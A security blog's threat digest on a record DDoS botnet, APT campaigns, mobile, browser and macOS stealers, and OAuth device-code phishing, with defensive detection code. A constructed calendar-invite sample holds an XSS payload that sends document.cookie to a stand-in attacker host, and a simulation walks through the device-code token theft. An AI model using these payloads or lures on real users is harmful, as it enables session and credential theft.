EvilBit Threat Digest - When the Bots Come Knocking: Record DDoS, State Actors, and the Week in Malware
Record 29.7 Tbps DDoS botnet, fresh APT campaigns, mobile and browser malware, and OAuth device code phishing—what defenders must do now.
KryptoKat here. It's been a particularly chaotic three days since our last check-in. The threat landscape delivered a record-breaking DDoS botnet, fresh APT campaigns from familiar adversaries, and a reminder that every platform--mobile, desktop, browser--is under sustained assault. The connective tissue this week is volume and persistence: massive botnets hammering infrastructure, state actors running multi-year espionage operations, and commodity malware campaigns that just won't quit.
Let's dig in.
The Aisuru Botnet: Setting New Records in Distributed Destruction
When Cloudflare publishes a threat intelligence report with numbers like 29.7 terabits per second and 14.1 billion packets per second, you pay attention. The Aisuru botnet represents the current state of the art in volumetric DDoS attacks, and its operational scale is genuinely staggering.
Aisuru emerged in early October and rapidly escalated from modest UDP floods to record-setting carpet-bombing attacks by mid-December. The botnet is estimated to comprise somewhere between 1 and 4 million compromised hosts--predominantly IoT devices, consumer routers (Totolink, Nexxt, Linksys, Zyxel), DVRs, IP cameras, and Cambium Networks wireless access points. Cloudflare's Q3 DDoS threat report notes that the botnet also includes a sizable contingent of cloud VMs, suggesting the operators are leveraging compromised cloud infrastructure alongside traditional IoT victims.
The attack methodology is straightforward but devastatingly effective: UDP amplification floods targeting telecommunications, IT services, and gaming sectors. The 29.7 Tbps peak represents the largest publicly documented DDoS event to date, eclipsing previous records by a significant margin. The collateral damage has been substantial--ISPs and transit providers in the US and globally have seen service degradation even when they weren't the primary targets, simply due to the sheer volume of malicious traffic saturating network links.
For defenders, Cloudflare published extensive IOCs: file hashes, domain names, hostnames, and IP addresses associated with the botnet's command-and-control infrastructure. The mitigations are textbook DDoS hygiene but worth reiterating: deploy robust DDoS protection capable of absorbing or scrubbing ultra-high-volume floods, harden and patch edge devices where vendor updates exist, and implement DNS-level rate limiting and ingress filtering to reduce collateral amplification. Protos Labs' deep dive provides additional technical context and detection strategies for network operators.
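As an added illustration of the network-side check Protos Labs' guidance points at (this is example code written for this digest, not Cloudflare's or Protos Labs' tooling), the Python below aggregates sampled flow records per destination, scales by the sampling rate, flags UDP targets over a rate threshold, and tells a reflection flood (well-known service source ports) apart from a direct botnet flood (random source ports). The flow records are constructed and the thresholds are placeholders to tune per link.

```python
"""Flag volumetric UDP floods in sampled flow records and name the vectors.

Added example for this digest, not Cloudflare's or Protos Labs' tooling. The flow
records are constructed to look like sFlow/NetFlow exports with a 1:1000 sampling
rate; the rate thresholds are illustrative and must be tuned per link.
"""
from collections import defaultdict

# UDP services commonly abused for reflection/amplification, keyed by source port.
AMPLIFIERS = {53: "DNS", 123: "NTP", 161: "SNMP", 389: "CLDAP", 1900: "SSDP", 11211: "memcached"}


def flood_report(flows, window_s, pps_threshold=500_000, gbps_threshold=5.0):
    """Aggregate sampled flows per destination and report UDP targets over threshold.

    Each record: {"src", "dst", "proto", "sport", "packets", "bytes", "sampling_rate"}.
    Counts are multiplied by the sampling rate to estimate the real traffic volume.
    """
    pkts, octets = defaultdict(int), defaultdict(int)
    sources, by_sport = defaultdict(set), defaultdict(lambda: defaultdict(int))
    for f in flows:
        if f["proto"] != 17:                     # UDP only; TCP SYN floods need a separate rule
            continue
        scale, dst = f["sampling_rate"], f["dst"]
        pkts[dst] += f["packets"] * scale
        octets[dst] += f["bytes"] * scale
        sources[dst].add(f["src"])
        by_sport[dst][f["sport"]] += f["packets"] * scale

    report = []
    for dst, count in pkts.items():
        pps = count / window_s
        gbps = octets[dst] * 8 / window_s / 1e9
        if pps < pps_threshold and gbps < gbps_threshold:
            continue
        top = sorted(by_sport[dst].items(), key=lambda kv: -kv[1])[:3]
        # Reflection traffic carries a well-known service source port; a direct
        # botnet flood shows random/ephemeral source ports from many hosts.
        kind = "amplification" if any(p in AMPLIFIERS for p, _ in top) else "direct_udp_flood"
        report.append({
            "target": dst, "pps": pps, "gbps": round(gbps, 2),
            "unique_sources": len(sources[dst]),
            "top_source_ports": [AMPLIFIERS.get(p, f"udp/{p}") for p, _ in top],
            "kind": kind,
        })
    return sorted(report, key=lambda r: -r["pps"])


def constructed_flows():
    """Ten seconds of made-up samples: one target under a DNS/NTP reflection flood,
    one under a direct flood from thousands of sources, and some ordinary QUIC traffic."""
    flows = []
    for i in range(4000):                        # reflected: few sources, service source ports
        flows.append({"src": f"198.51.100.{i % 40}", "dst": "203.0.113.10", "proto": 17,
                      "sport": 53 if i % 3 else 123, "packets": 3, "bytes": 1400, "sampling_rate": 1000})
    for i in range(3000):                        # direct: many sources, random source ports
        flows.append({"src": f"192.0.{i // 250}.{i % 250}", "dst": "203.0.113.11", "proto": 17,
                      "sport": 20000 + (i * 7919) % 40000, "packets": 2, "bytes": 512, "sampling_rate": 1000})
    for i in range(50):                          # normal HTTPS-over-QUIC, stays under threshold
        flows.append({"src": f"192.0.2.{i}", "dst": "203.0.113.20", "proto": 17,
                      "sport": 443, "packets": 1, "bytes": 1200, "sampling_rate": 1000})
    flows.append({"src": "192.0.2.1", "dst": "203.0.113.10", "proto": 6, "sport": 443,
                  "packets": 10, "bytes": 5000, "sampling_rate": 1000})  # TCP, ignored here
    return flows


if __name__ == "__main__":
    for row in flood_report(constructed_flows(), window_s=10):
        print(row)
```

The "kind" field matters operationally: a reflection flood is mitigated at the amplifier source ports (and by getting open resolvers/NTP servers on your own ranges closed), whereas a direct flood from compromised devices can only be absorbed or scrubbed upstream.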
The broader takeaway: IoT security (or lack thereof) remains a systemic vulnerability. The same device categories compromised in 2016's Mirai botnet are still being compromised today. Until manufacturers ship devices with secure defaults and automatic patching, we'll continue to see botnets of this scale.
APT Campaigns: Persistent Adversaries, Evolving Tactics
Cloud Atlas Returns with Old Exploits and New Tradecraft
Kaspersky's analysis of Cloud Atlas activity in the first half of 2025 shows a group that has refined its approach while sticking to a familiar playbook. The APT (also tracked as Inception by other vendors) continues to target high-value entities in Russia and Belarus--telecommunications providers, construction firms, and government agencies--using a multi-stage infection chain that blends old and new.
The initial access vector remains spearphishing with malicious Office documents, exploiting the ancient-but-still-effective CVE-2018-0802 in Microsoft Office Equation Editor. Yes, a 2018 vulnerability is still yielding access in 2025. The attackers also leveraged CVE-2025-55182, the recent React Server Components RCE we've covered extensively in prior editions, demonstrating their ability to rapidly integrate newly disclosed vulnerabilities into their toolkit.
Once initial execution is achieved, the campaign deploys a suite of custom backdoors: VBShower, PowerShower, VBCloud, and CloudAtlas. These tools provide the usual APT capabilities--command execution, file exfiltration, credential harvesting, and lateral movement. What's interesting is the operational security: the actors use process injection, DLL side-loading, and obfuscation to evade detection, and they maintain long-term access by establishing scheduled tasks and registry persistence.
Kaspersky provides IOCs (file hashes, domains, URLs) and MITRE ATT&CK mappings for defensive teams. The persistence mechanisms--Active Setup registry keys, scheduled tasks, and hidden startup items--are all detectable if you're actively hunting for them. For organizations in the targeted regions or sectors, this is a high-priority threat to incorporate into detection engineering workflows.
Russian APT Targets Baltics and Balkans with Zimbra Exploitation
A separate campaign documented by StrikeReady shows Russian APT operators exploiting CVE-2025-27915, a stored cross-site scripting (XSS) vulnerability in Zimbra Collaboration Suite, to harvest credentials from government and critical infrastructure targets across the Baltic and Balkan regions.
The attack begins with spearphishing emails containing malicious ICS (calendar invite) attachments. When the victim opens the attachment in a vulnerable Zimbra instance, the embedded XSS payload executes, presenting a fake login form that exfiltrates credentials to the attacker's infrastructure. In some cases, the payload also delivers UPX-packed malware for persistent access.
CISA added CVE-2025-27915 to the Known Exploited Vulnerabilities catalog on December 22, and Zimbra has released patches in versions 10.0.13, 10.1.5, and 9.0.0 P44 and later. The campaign has been active since at least 2023, suggesting the operators have had sustained access to unpatched instances for an extended period.
For defenders running Zimbra, the immediate actions are to patch to the fixed versions, block the known malicious IP (193.29.58.37), and hunt for the file hashes and email lure indicators provided by StrikeReady. If you can't patch immediately, disable ICS processing in Zimbra and enforce multi-factor authentication on all user accounts.
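A mail-gateway or hunting check for this lure, as an added example written for this digest (not StrikeReady's or Zimbra's tooling): the Python below unfolds an .ics attachment per RFC 5545, undoes ICS text escaping, and flags any rendered property (SUMMARY, DESCRIPTION, LOCATION, ORGANIZER, ATTENDEE, X-*) that carries an HTML tag, an inline event handler, a script URI, or entity-encoded angle brackets. The two invites are constructed for illustration and are not the real lure.

```python
"""Scan calendar (.ics) attachments for HTML or script content in rendered fields.

Added example for this digest, not tooling from StrikeReady or Zimbra. The two
invites below are constructed for illustration and are not the real lure; the
checks are generic and would catch any inline-tag or event-handler payload of
the kind described above.
"""
import re

# Properties webmail clients render into the page, so they can carry a stored XSS.
TEXT_PROPERTIES = {"SUMMARY", "DESCRIPTION", "LOCATION", "COMMENT", "ORGANIZER", "ATTENDEE"}

SUSPICIOUS = [
    ("html_tag", re.compile(r"<\s*/?\s*[a-z][\w-]*[^>]*>", re.I)),
    ("event_handler", re.compile(r"\bon[a-z]+\s*=", re.I)),            # onerror=, ontoggle=, ...
    ("script_uri", re.compile(r"javascript\s*:|data\s*:\s*text/html", re.I)),
    ("encoded_bracket", re.compile(r"&#x?0*(?:3c|3e|60|62);|%3c|%3e", re.I)),
]


def unfold(ics):
    """Join RFC 5545 folded lines: a line starting with SPACE or TAB continues the previous one."""
    current = None
    for raw in ics.splitlines():
        if raw[:1] in (" ", "\t") and current is not None:
            current += raw[1:]
        else:
            if current is not None:
                yield current
            current = raw
    if current is not None:
        yield current


def unescape_text(value):
    r"""Undo ICS TEXT escaping (\n \N \, \; \\) so the payload is inspected as the client sees it."""
    out, i = [], 0
    while i < len(value):
        if value[i] == "\\" and i + 1 < len(value):
            nxt = value[i + 1]
            out.append("\n" if nxt in "nN" else nxt)
            i += 2
        else:
            out.append(value[i])
            i += 1
    return "".join(out)


def scan_ics(ics):
    """Return one finding per rendered property that carries active content."""
    findings = []
    for line in unfold(ics):
        m = re.match(r"[A-Za-z0-9-]+", line)
        if not m:
            continue
        name = m.group(0).upper()
        if name not in TEXT_PROPERTIES and not name.startswith("X-"):
            continue
        # Parameters (e.g. ;CN=...) are rendered too, so scan everything after the name.
        content = unescape_text(line[len(name):])
        # X-ALT-DESC legitimately carries HTML (Outlook), so only flag active content there.
        checks = SUSPICIOUS[1:] if name == "X-ALT-DESC" else SUSPICIOUS
        for label, pattern in checks:
            hit = pattern.search(content)
            if hit:
                findings.append({"property": name, "kind": label, "match": hit.group(0)[:60]})
                break
    return findings


BENIGN_INVITE = (                                   # constructed sample
    "BEGIN:VCALENDAR\r\nVERSION:2.0\r\nBEGIN:VEVENT\r\n"
    "ORGANIZER;CN=Alice Example:mailto:alice@example.com\r\n"
    "SUMMARY:Quarterly review\r\n"
    "DESCRIPTION:Agenda\\, slides & notes\r\n"
    " attached. Dial-in: +1 555 0100\r\n"
    "END:VEVENT\r\nEND:VCALENDAR\r\n"
)
MALICIOUS_INVITE = (                                # constructed sample, payload split by folding
    "BEGIN:VCALENDAR\r\nVERSION:2.0\r\nBEGIN:VEVENT\r\n"
    "SUMMARY:Ministry briefing\r\n"
    "DESCRIPTION:Please confirm attendance <details open ontog\r\n"
    " gle=\"fetch('https://attacker.invalid/c?'+document.cookie)\">\r\n"
    "LOCATION:Room 4 &#60;img src=x onerror=alert(1)&#62;\r\n"
    "END:VEVENT\r\nEND:VCALENDAR\r\n"
)

if __name__ == "__main__":
    print(scan_ics(BENIGN_INVITE))      # []
    print(scan_ics(MALICIOUS_INVITE))
```

Unfolding before matching is the part that matters: a payload broken across a folded line is reassembled by the client before rendering, so a scanner that matches on raw lines misses it.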
Mobile and Endpoint Malware: From Uzbekistan to macOS
Android SMS Stealers Compromise 100,000 Devices in Uzbekistan
Group-IB's research into the Qwizzserial and Wonderland SMS stealer families reveals a campaign that has quietly compromised approximately 100,000 Android devices in Uzbekistan. The malware targets banking applications, intercepting SMS-based one-time passwords and exfiltrating credentials to attacker-controlled infrastructure. Victims have collectively suffered over $62,000 in confirmed losses, though the actual figure is likely much higher.
The attack vector is straightforward but effective: malicious APKs distributed via Telegram channels, masquerading as legitimate government services or financial assistance applications. Once installed, the malware requests SMS and phone state permissions, then silently harvests OTPs as they arrive, forwarding them to the attacker's server. The campaign's success is a direct consequence of Uzbekistan's financial infrastructure relying almost exclusively on SMS for two-factor authentication, with minimal adoption of stronger methods like biometrics or 3D Secure.
Group-IB provides file hashes and network IOCs for detection. The mitigations are procedural and technical: download apps only from official stores, enable biometric authentication where available, and implement mobile device management (MDM) policies that restrict installation sources and monitor suspicious SMS activity. For regional financial institutions, this is a wake-up call to move beyond SMS-based authentication.
Phantom Shuttle: Chrome Extensions as Credential Harvesters
Socket.dev's research uncovered two malicious Chrome extensions, both published under the name "Phantom Shuttle", that have been live on the Chrome Web Store since at least 2017. The extensions masquerade as VPN or network speed testing tools but actually route web traffic through attacker-controlled proxy servers, exfiltrating plaintext credentials every five minutes.
The attack is clever in its simplicity: users install what they believe is a legitimate productivity tool, unknowingly granting the extension permission to intercept and redirect all web requests. The extension routes traffic for over 170 high-value domains--including GitHub, Docker Hub, AWS, Stack Overflow, and various social media sites--through the proxy at phantomshuttle.space, where credentials are harvested via man-in-the-middle interception. One caveat on scope: a proxy in that position sees every destination and the full content of anything sent over plain HTTP, but it cannot read HTTPS traffic without a certificate the browser trusts, so treat every credential used in an affected browser as exposed rather than trying to work out which ones were actually captured. The extensions also charge subscription fees, so victims are literally paying for the privilege of being compromised.
The campaign's longevity (8+ years) and the fact that the extensions remain available on the official Chrome Web Store as of December 23 underscore the challenges of extension vetting and malware persistence in app stores. For defenders, the immediate actions are to block phantomshuttle.space at the network perimeter, audit all installed browser extensions, and enforce Chrome enterprise policies that restrict extensions to an allowlist of trusted publishers. All credentials potentially accessed through affected browsers should be rotated immediately.
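The extension audit above can be scripted against the manifests of whatever is installed. As an added example written for this digest (not Socket.dev's or Google's tooling), the Python below parses a manifest.json (MV2 or MV3), rates the combination of redirect-capable API permissions (proxy, webRequestBlocking, declarativeNetRequest, debugger) with all-site host access, and emits the Chrome ExtensionSettings policy that enforces an allowlist and denies those permissions by default. The manifests are constructed (the "VPN" one is shaped like a proxy extension, not the real Phantom Shuttle manifest) and the extension ID in the policy is a placeholder.

```python
"""Audit Chrome extension manifests for the permission set that enables traffic interception.

Added example for this digest, not tooling from Socket.dev or Google. The manifests
below are constructed (the "VPN" one is shaped like a proxy extension, not the real
Phantom Shuttle manifest) and extension IDs passed to the policy are placeholders.
"""
import json

# API permissions that let an extension redirect or observe browsing traffic.
INTERCEPT_API = {
    "proxy": "can route all browser traffic through an arbitrary proxy",
    "webRequest": "can observe every request's URL and headers",
    "webRequestBlocking": "can modify or block requests synchronously (MV2)",
    "declarativeNetRequest": "can redirect or rewrite requests by rule (MV3)",
    "debugger": "can drive any tab over the DevTools protocol",
}
REDIRECT_CAPABLE = {"proxy", "webRequestBlocking", "declarativeNetRequest", "debugger"}


def is_broad_host(pattern):
    """True for match patterns covering every site: <all_urls>, *://*/*, https://*/* ..."""
    p = pattern.strip()
    return p == "<all_urls>" or p.startswith(("*://*/", "http://*/", "https://*/"))


def audit_manifest(manifest, name="unknown"):
    """Return {"extension", "risk", "reasons"} for one parsed manifest.json."""
    declared = set(manifest.get("permissions", []))
    # MV2 lists host patterns inside "permissions"; MV3 moves them to "host_permissions".
    hosts = set(manifest.get("host_permissions", []))
    hosts |= {p for p in declared if "://" in p or p == "<all_urls>"}
    api = declared - hosts
    reasons = [f"{p}: {why}" for p, why in INTERCEPT_API.items() if p in api]
    broad = sorted(h for h in hosts if is_broad_host(h))
    if broad:
        reasons.append("all-site host access: " + ", ".join(broad))
    # Redirect-capable API plus all-site host access is the proxy-stealer shape:
    # every site the victim visits can be routed to the operator.
    if api & REDIRECT_CAPABLE and broad:
        risk = "high"
    elif reasons:
        risk = "medium"
    else:
        risk = "low"
    return {"extension": name, "risk": risk, "reasons": reasons}


def extension_settings_policy(allowed_ids):
    """Chrome ExtensionSettings policy: block everything not allowlisted and deny the
    interception permissions by default (grant per extension with allowed_permissions
    if a vetted extension genuinely needs them)."""
    policy = {"*": {"installation_mode": "blocked",
                    "blocked_permissions": ["proxy", "webRequest", "webRequestBlocking", "debugger"]}}
    for ext_id in allowed_ids:
        policy[ext_id] = {"installation_mode": "allowed"}
    return policy


VPN_MANIFEST = json.loads("""{
  "manifest_version": 3,
  "name": "Shuttle Speed VPN (constructed sample)",
  "permissions": ["proxy", "storage", "webRequest", "alarms"],
  "host_permissions": ["<all_urls>"],
  "background": {"service_worker": "background.js"}
}""")
LEGACY_MANIFEST = json.loads("""{
  "manifest_version": 2,
  "name": "Legacy proxy helper (constructed sample)",
  "permissions": ["webRequest", "webRequestBlocking", "*://*/*"]
}""")
TAB_COUNTER_MANIFEST = json.loads("""{
  "manifest_version": 3,
  "name": "Tab counter (constructed sample)",
  "permissions": ["tabs", "storage"]
}""")

if __name__ == "__main__":
    for label, m in [("vpn", VPN_MANIFEST), ("legacy", LEGACY_MANIFEST), ("tabs", TAB_COUNTER_MANIFEST)]:
        print(audit_manifest(m, label))
    print(json.dumps(extension_settings_policy(["placeholder-extension-id"]), indent=2))
```

On a managed fleet, the manifests live under each profile's Extensions directory and Chrome's enterprise reporting can list installed IDs; either feeds straight into audit_manifest, and the resulting allowlist goes into the ExtensionSettings policy.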
MacSync Stealer: Notarized Malware on macOS
UncleSp1d3r here. The macOS threat landscape continues to mature, and Jamf's analysis of MacSync Stealer is a textbook example of adversaries abusing Apple's developer trust model. The malware arrives as a notarized, code-signed Swift application packaged in a disk image (zk-call-messenger-installer-3.9.2-lts.dmg), which passes macOS Gatekeeper checks because it's signed with a legitimate Developer Team ID (GNJLS3UYZ4).
Once executed, the installer runs runtimectl to fetch an obfuscated script from focusgroovy.com, gatemaden.space, or zkcall.net. The script lands in /tmp/runner, has its com.apple.quarantine extended attribute cleared (so Gatekeeper treats the file as local rather than downloaded), is checked with spctl, and is then executed. The payload itself is obfuscated via base64 encoding, gzip compression, and eval, minimizing on-disk artifacts and evading signature-based detection.
The malware establishes persistence via ~/Library/Application Support/UserSyncWorker/ and logs activity to ~/Library/Logs/UserSyncWorker.log. The C2 infrastructure supports staged payload delivery, credential theft, and file exfiltration. Jamf reported the malicious developer certificate to Apple, which subsequently revoked it--but the malware demonstrates the ongoing challenge of combating signed, notarized threats.
For macOS defenders, the hunting indicators are clear: creation of the UserSyncWorker directory and log file, execution of /tmp/runner, suspicious network connections to the listed domains, and the specific Developer Team ID. Block the domains at the perimeter, deploy EDR configured to alert on these patterns, and consider restricting or monitoring the use of runtimectl and spctl in your environment. Jamf Protect customers should enable block mode for advanced threat prevention.
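The hunting indicators above turn into a small correlation rule set. As an added example written for this digest (not Jamf's detection logic), the Python below runs over constructed EDR-style process, file, and network events and raises both plain IOC hits (the domains, Team ID, and paths quoted above) and one behavioural hit that survives a certificate revocation: a file whose quarantine flag was stripped is executed within a short window on the same host. The events are constructed, including a benign developer host to show the window doing its job.

```python
"""Hunt for the MacSync Stealer execution chain in endpoint telemetry.

Added example for this digest, not Jamf's detection logic. The events are constructed
to resemble process/file/network telemetry an EDR would emit (not real captures); the
domains, team ID, and paths are the indicators quoted in the write-up above.
"""
from collections import defaultdict

IOC_DOMAINS = {"focusgroovy.com", "gatemaden.space", "zkcall.net"}
IOC_TEAM_ID = "GNJLS3UYZ4"
IOC_PATHS = ("/tmp/runner", "/Library/Application Support/UserSyncWorker/", "/Library/Logs/UserSyncWorker.log")


def quarantine_strip_target(argv):
    """Return the file whose com.apple.quarantine attribute an xattr call removes, else None."""
    if not argv or argv[0].rsplit("/", 1)[-1] != "xattr":
        return None
    if "-c" in argv or ("-d" in argv and "com.apple.quarantine" in argv):
        return argv[-1]
    return None


def hunt(events, window_s=120):
    """Return one alert per (event, rule) hit.

    Rules: known IOC path/domain/team ID, plus the behavioural one that still works
    after Apple revokes the certificate: quarantine stripped from a file that is
    then executed shortly afterwards on the same host.
    """
    alerts = []
    stripped = defaultdict(dict)          # host -> {path: timestamp of the xattr removal}
    for ev in sorted(events, key=lambda e: e["ts"]):
        host, hits = ev["host"], []
        if ev["type"] == "exec":
            argv = ev["argv"]
            target = quarantine_strip_target(argv)
            if target:
                stripped[host][target] = ev["ts"]
            t0 = stripped[host].get(argv[0])
            if t0 is not None and ev["ts"] - t0 <= window_s:
                hits.append("quarantine_strip_then_exec")
            if any(p in arg for arg in argv for p in IOC_PATHS):
                hits.append("ioc_path")
            if ev.get("team_id") == IOC_TEAM_ID:
                hits.append("ioc_team_id")
        elif ev["type"] == "file_create" and any(p in ev["path"] for p in IOC_PATHS):
            hits.append("ioc_path")
        elif ev["type"] == "net" and ev["domain"] in IOC_DOMAINS:
            hits.append("ioc_domain")
        alerts.extend({"host": host, "ts": ev["ts"], "rule": r, "event": ev} for r in hits)
    return alerts


CONSTRUCTED_EVENTS = [
    # mac-01: the installer chain as described in the write-up
    {"ts": 100, "host": "mac-01", "type": "exec", "team_id": "GNJLS3UYZ4",
     "argv": ["/Volumes/ZK Call/Installer.app/Contents/MacOS/Installer"]},
    {"ts": 101, "host": "mac-01", "type": "net", "domain": "focusgroovy.com"},
    {"ts": 102, "host": "mac-01", "type": "exec", "argv": ["xattr", "-d", "com.apple.quarantine", "/tmp/runner"]},
    {"ts": 103, "host": "mac-01", "type": "exec", "argv": ["spctl", "--assess", "--type", "execute", "/tmp/runner"]},
    {"ts": 104, "host": "mac-01", "type": "exec", "argv": ["/tmp/runner"]},
    {"ts": 110, "host": "mac-01", "type": "file_create",
     "path": "/Users/jdoe/Library/Application Support/UserSyncWorker/agent"},
    # mac-02: a developer clearing quarantine on their own build and running it hours later
    {"ts": 200, "host": "mac-02", "type": "exec", "argv": ["xattr", "-d", "com.apple.quarantine", "/Users/dev/out/tool"]},
    {"ts": 200 + 4 * 3600, "host": "mac-02", "type": "exec", "argv": ["/Users/dev/out/tool"]},
    {"ts": 201, "host": "mac-02", "type": "net", "domain": "github.com"},
]

if __name__ == "__main__":
    for a in hunt(CONSTRUCTED_EVENTS):
        print(a["host"], a["ts"], a["rule"])
```

The window is the tuning knob: developers do strip quarantine from their own builds, so the behavioural rule is best weighted by path (anything under /tmp or a user's Downloads) rather than fired on its own.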
Nezha Monitoring Tool Abused as a RAT
Legitimate system administration tools continue to be repurposed for post-exploitation access. Multiple outlets report that threat actors are deploying the open-source Nezha monitoring agent as a remote access trojan (RAT) to maintain stealthy, elevated access to compromised systems.
Nezha is a cross-platform (Linux, Windows, macOS) server monitoring tool that runs with root or SYSTEM privileges and communicates with a central dashboard over TCP. Attackers abuse this by deploying the agent on compromised hosts and pointing it at their own Alibaba Cloud-hosted C2 infrastructure. The result is a powerful backdoor that supports command execution and file transfers while appearing as a benign monitoring agent.
The detection challenge is context: Nezha itself isn't malicious, and blocking it wholesale would break legitimate use cases. Defenders need to focus on usage patterns--unexpected Nezha deployments, C2 traffic to unfamiliar or suspicious IP addresses (particularly Alibaba Cloud ranges associated with known malicious infrastructure), and process injection or anomalous PowerShell spawned by the agent.
The mitigations are behavioral: monitor for unexpected agent installations, segment network access to known C2 infrastructure, and implement endpoint detection rules that flag anomalous Nezha activity. This is another reminder that dual-use tools demand context-aware detection, not just signature-based blocking.
OAuth Device Code Flow: The New Phishing Frontier
Proofpoint's research on OAuth 2.0 device code flow abuse highlights a technique that's gaining traction among threat actors targeting Microsoft 365 environments. The attack leverages the legitimate device authorization grant flow (defined in RFC 8628) to trick users into approving sign-ins on real Microsoft pages, yielding valid cloud session tokens without stealing passwords directly.
The attack chain works like this: the victim receives a phishing email or SMS containing a link. Clicking the link directs them to a legitimate Microsoft device code approval page (microsoft.com/devicelogin), where they're prompted to enter a code and approve the sign-in. The user believes they're completing a legitimate authentication step, but they're actually authorizing the attacker's application to access their Microsoft 365 account. Once approved, the attacker receives a valid OAuth token with full access to email, files, and other cloud resources.
This technique slips past traditional phishing detections because the victim interacts with a genuine Microsoft page, and it sidesteps MFA rather than defeating it: the victim satisfies the MFA prompt in their own browser, and the resulting access and refresh tokens are issued to the attacker's client, which never had to present a second factor itself. Mandiant, Volexity, and Microsoft have all documented real-world abuse of this technique by multiple threat actors.
For defenders, the mitigations are tenant-level policy enforcement and monitoring:
- Block the OAuth 2.0 device code flow where it is not required (the Conditional Access "Authentication flows" condition can target it directly), and scope any remaining use to specific applications and users.
- Enforce Conditional Access policies requiring compliant/managed devices and strong authentication for all cloud app sign-ins.
- Restrict user consent; require admin consent and review enterprise app permissions regularly.
- Monitor Entra ID (formerly Azure AD) sign-in logs for device code sign-ins (Authentication Protocol = Device Code), and treat unfamiliar locations, atypical user agents, or a user's first-ever use of the flow as high-signal anomalies.
- Enable token protection, continuous access evaluation, and sign-in risk policies.
- Train users to verify that they initiated any device code prompt themselves before approving.
Microsoft's official documentation on the device code flow includes security considerations and configuration guidance. This is a technique-focused defense--there aren't specific IOCs to block, but the policy controls are actionable and effective.
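To make the token-binding problem concrete, here is the RFC 8628 exchange from the attacker's side, as an added example written for this digest: the in-memory authorization server is a minimal stand-in for the Microsoft identity platform (it is not Microsoft code), and it shows that the grant is tied to the client that requested the code, not to the browser that approved it, so the victim's MFA ends up unlocking the attacker's session. The second half runs the monitoring bullet above over constructed sign-in records; the field names (authenticationProtocol == "deviceCode", location.countryOrRegion, userAgent) follow the Entra sign-in log schema as exported to a SIEM and should be confirmed against your own tenant's export.

```python
"""The device authorization grant (RFC 8628) as the attacker uses it, plus a log check.

Added example for this digest. The authorization server is a minimal stand-in for the
Microsoft identity platform (not Microsoft code) so the token-binding problem is visible
end to end. The sign-in records are constructed; their field names follow the Entra
sign-in log export schema as I understand it and should be confirmed per tenant.
"""
import secrets
import time


class DeviceAuthServer:
    """Minimal RFC 8628 server. Key property: a user_code is bound to the client that
    requested it, never to the browser (or MFA device) that approves it."""

    def __init__(self, now=time.time):
        self.now = now
        self.pending = {}                               # device_code -> grant record

    def device_authorization(self, client_id, scope):
        """POST /devicecode: the *client* (here, the attacker) starts the flow."""
        device_code = secrets.token_urlsafe(32)
        user_code = f"{secrets.randbelow(10 ** 4):04d}-{secrets.randbelow(10 ** 4):04d}"
        self.pending[device_code] = {"client_id": client_id, "scope": scope, "user_code": user_code,
                                     "expires": self.now() + 900, "approved_by": None}
        return {"device_code": device_code, "user_code": user_code, "expires_in": 900,
                "interval": 5, "verification_uri": "https://microsoft.com/devicelogin"}

    def approve(self, user_code, user, mfa_passed):
        """What the genuine devicelogin page does when the victim types the code."""
        for rec in self.pending.values():
            if rec["user_code"] == user_code and self.now() < rec["expires"]:
                if not mfa_passed:
                    return "mfa_required"
                rec["approved_by"] = user               # MFA done by the victim; grant belongs to rec["client_id"]
                return "approved"
        return "invalid_code"

    def token(self, device_code, client_id):
        """POST /token, grant_type=urn:ietf:params:oauth:grant-type:device_code, polled by the client."""
        rec = self.pending.get(device_code)
        if rec is None or rec["client_id"] != client_id:
            return {"error": "invalid_grant"}
        if self.now() >= rec["expires"]:
            return {"error": "expired_token"}
        if rec["approved_by"] is None:
            return {"error": "authorization_pending"}
        self.pending.pop(device_code)
        return {"access_token": "at-" + secrets.token_hex(8), "refresh_token": "rt-" + secrets.token_hex(8),
                "scope": rec["scope"], "sub": rec["approved_by"]}


def run_attack(server, attacker_client_id="attacker-cli", victim="alice@example.com"):
    """Attacker starts the flow, lures the victim into approving, then collects the tokens."""
    start = server.device_authorization(attacker_client_id, "Mail.Read Files.Read offline_access")
    first_poll = server.token(start["device_code"], attacker_client_id)     # nothing yet
    # ... the lure delivers start["user_code"] plus the real verification_uri to the victim ...
    outcome = server.approve(start["user_code"], victim, mfa_passed=True)
    tokens = server.token(start["device_code"], attacker_client_id)         # issued to the attacker
    return {"first_poll": first_poll, "approval": outcome, "tokens": tokens}


def device_code_signin_alerts(signins, usual_countries):
    """Every device-code sign-in is worth a look; annotate the ones that are also anomalous."""
    alerts = []
    for s in signins:
        if s.get("authenticationProtocol") != "deviceCode":
            continue
        reasons = []
        if s["location"]["countryOrRegion"] not in usual_countries.get(s["userPrincipalName"], set()):
            reasons.append("unfamiliar_country")
        if s.get("userAgent", "").startswith(("python-requests", "curl", "Go-http-client")):
            reasons.append("scripted_user_agent")
        alerts.append({"user": s["userPrincipalName"], "app": s.get("appDisplayName"),
                       "reasons": reasons or ["device_code_flow"]})
    return alerts


CONSTRUCTED_SIGNINS = [                                 # constructed, not a real export
    {"userPrincipalName": "alice@example.com", "authenticationProtocol": "deviceCode",
     "appDisplayName": "Microsoft Authentication Broker", "location": {"countryOrRegion": "NL"},
     "userAgent": "python-requests/2.32"},
    {"userPrincipalName": "bob@example.com", "authenticationProtocol": "none",
     "appDisplayName": "Office 365 Exchange Online", "location": {"countryOrRegion": "US"},
     "userAgent": "Mozilla/5.0 (Macintosh)"},
    {"userPrincipalName": "carol@example.com", "authenticationProtocol": "deviceCode",
     "appDisplayName": "Microsoft Azure CLI", "location": {"countryOrRegion": "US"},
     "userAgent": "AZURECLI/2.65.0"},
]
USUAL_COUNTRIES = {"alice@example.com": {"US"}, "bob@example.com": {"US"}, "carol@example.com": {"US"}}

if __name__ == "__main__":
    print(run_attack(DeviceAuthServer()))
    print(device_code_signin_alerts(CONSTRUCTED_SIGNINS, USUAL_COUNTRIES))
```

Two things to take from the run: the first poll returns authorization_pending and the second returns tokens whose subject is the victim, with no credential ever passing through the attacker; and a client that did not start the flow cannot redeem the code, which is why blocking the flow for unmanaged clients at the tenant (rather than trying to spot the lure) is the control that works.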
Closing Thoughts
This week's stories share a common thread: adversaries are diversifying their tactics, targeting every available platform and trust relationship. IoT botnets achieve record-breaking scale because manufacturers still ship devices with default credentials. APT groups maintain multi-year access because organizations don't patch seven-year-old Office vulnerabilities. Mobile malware thrives because users trust apps distributed via Telegram. And phishing succeeds because the attack surface has shifted from fake login pages to legitimate OAuth flows.
